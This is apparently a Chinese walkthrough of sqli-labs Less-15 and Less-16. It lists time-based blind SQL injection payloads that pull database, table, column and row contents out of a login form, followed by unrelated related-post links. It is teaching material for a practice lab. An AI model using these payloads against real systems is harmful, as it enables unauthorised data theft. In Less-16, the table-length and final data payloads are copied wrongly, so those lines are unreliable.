Less-15(布尔/时间盲注)

1.判断是否存在注入点

无论是输入admin/admin’/admin” 都显示回显正常,于是执行uname=admin' and sleep(5)#&passwd=&submit=Submit,发现延时回显,首先判断存在注入点,注入方式为:’’

2.爆库

爆库长:uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit

判断的数据库字符长度为8

爆库名:uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

判断数据库名字的第一个字符

3.爆表

爆第一个表长:uname=admin' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(3),1)#&passwd=&submit=Submit

爆第一个表名:admin' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#

4.爆字段

爆第一个字段的长度:admin' and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#

爆第一个字段名:admin' and if(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#

5.爆数据

爆第一个数据的长度:admin' and if(length((select id from emails limit 0,1))=1,sleep(3),1)#

爆第一个数据:admin' and if(substr((select id from emails limit 0,1),1,1)=1,sleep(3),1)#

-------------------------------------------------------END----------------------------------------------------------------

Less-16 (布尔/时间盲注)

1.判断是否存在注入点

执行uname=admin" and sleep(3)#&passwd=&submit=Submit或者uname=admin’ and sleep(3)#&passwd=&submit=Submit后均无反应,于是尝试执行uname=admin") and sleep(3)#&passwd=&submit=Submit,页面发生延迟,判断存在注入点

2.爆库

爆库长:uname=admin") and if (length(database())=8,sleep(3),1)#&passwd=&submit=Submit

判断数据库的长度是8

爆库名:uname=admin") and if (substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

判断数据库名字的第一个字母是什么

以此类推,得到数据库名为’security’

3.爆表

爆第一个表长:uname=admin") and if (length((select table_name from information_schema.tables where table_schema='security' limit 0,1)),sleep(3),1)#&passwd=&submit=Submit

爆第一个表名:uname=admin") and if (substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#&passwd=&submit=Submit

4.爆字段

爆第一个字段长:uname=admin") and if (length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#&passwd=&submit=Submit

爆第一个字段名:uname=admin") and if (substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#&passwd=&submit=Submit

5.爆数据

爆第一个数据长:uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

爆第一个数据:uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

-------------------------------------------------------END----------------------------------------------------------------

sqli-labs less-15 --> less-16的更多相关文章

  1. Gold Coins 分类: POJ 2015-06-10 15:04 16人阅读 评论(0) 收藏

    Gold Coins Time Limit: 1000MS   Memory Limit: 30000K Total Submissions: 21767   Accepted: 13641 Desc ...

  2. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  3. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  4. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  5. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  6. OpenGL第15,16,17讲小结

    这三讲没有什么特别的感觉,15讲把纹理贴到3D字体上,16讲讲了雾的生成,17讲是通过以事先保存好的纹理贴图的字体来显示2D文字,这样子不用调用windows的字体,而是使用纹理中的字体.这样也在一定 ...

  7. 阅读<构建之法>13、14、15、16、17章

    13章 这么多测试为什么不能整理出一个包括所有功能的测试呢?看着那么多测试都感觉奇怪了. 14章 怎样才能体现一个测试人员的工作价值呢?这样的判断又是否会太独断了? 15章 在时间上,会不会因不同功能 ...

  8. 阅读<构建之法>第13、14、15、16、17章 与 《一个程序员的生命周期》读后感

    第十三章   软件测试 这一章介绍了很多关于测试的方法,比如说单元测试,代码覆盖率测试,构建验证测试,验收测试等,我有一个很纠结的问题,如果我开发软件,是把这么多测试全做完,还是挑一些测试来进行呢?如 ...

  9. RH033读书笔记(15)-Lab 16 The Linux Filesystem

    Lab 16 The Linux Filesystem Goal: Develop a better understanding of Linux filesystem essentials incl ...

  10. LeetCode 15. 3Sum 16. 3Sum Closest 18. 4Sum

    n数求和,固定n-2个数,最后两个数在连续区间内一左一右根据当前求和与目标值比较移动,如果sum<target,移动较小数,否则,移动较大数 重复数处理: 使i为左至右第一个不重复数:while ...

随机推荐

  1. 《Head first设计模式》之观察者模式

    观察者模式定义了对象之间的一对多依赖,这样一来,当一个对象改变状态时,它的所有依赖者都会收到通知并自动更新. 客户有一个WeatherData对象,负责追踪温度.湿度和气压等数据.现在客户给我们提了个 ...

  2. vue 信使 ------fetch、axios

    fetch 1.什么是fetch 相当于promise 必须写两个then 第一个then返回状态码 返回成json格式 第二个then返回json数据 2.使用方法 $ npm install fe ...

  3. 中文维基百科分类提取(jwpl)--构建知识图谱数据获取

    首先感谢 : 1.https://blog.csdn.net/qq_39023569/article/details/88556301 2.https://www.cnblogs.com/Cheris ...

  4. Android 6.0(棉花糖)新特性

    1.支持4K显示 Android 6.0本身已经支持4K显示,会通过一定优化形式使4K内容更加清晰. 2. 启动验证 (更完整的应用权限管理) Android 6.0在开机时会自动运行验证代码,检测设 ...

  5. 如何通过adb command 完成自动SD卡升级?

    如何通过adb command 完成自动SD卡升级? 原创 2014年09月09日 10:50:57 2746 通过adb 命令的方式,免去了按powerkey+volumeup进入menu sele ...

  6. 算法将一个对象中的某一个key值变为true,其他值都为false

    主要运用在,v-if v-show切换不同内容时,非常快的打开某一个区域,关闭其他的区域哈. 这样就不需要每一个设置false,打开区域设置为true. 可以优化代码哈 for in 主要循环对象(空 ...

  7. GNU make doc - 3.8

    Note that the directory prefix (D), as described in Implicit Rule Search Algorithm, is appended (aft ...

  8. localStorage 存储

    localStorage 的优势 localStorage 拓展了 cookie 的 4K 限制. localStorage 会可以将第一次请求的数据直接存储到本地,这个相当于一个 5M 大小的针对于 ...

  9. python第三方库的安装pip的使用与换源(解决pip下载速度慢)

    python和其他语言一样,也有大量的第三方库 在安装python时默认都会安装pip,安装了pip后 在cmd.exe下可以运行pip 安装库 pip install 库的名字 换源 因为PyPi地 ...

  10. Treap总结

    \(Treap = Tree + Heap\) 树堆(Treap),在数据结构中也称Treap,是指有一个随机附加域满足堆的性质的二叉搜索树,其结构相当于以随机数据插入的二叉搜索树.其基本操作的期望时 ...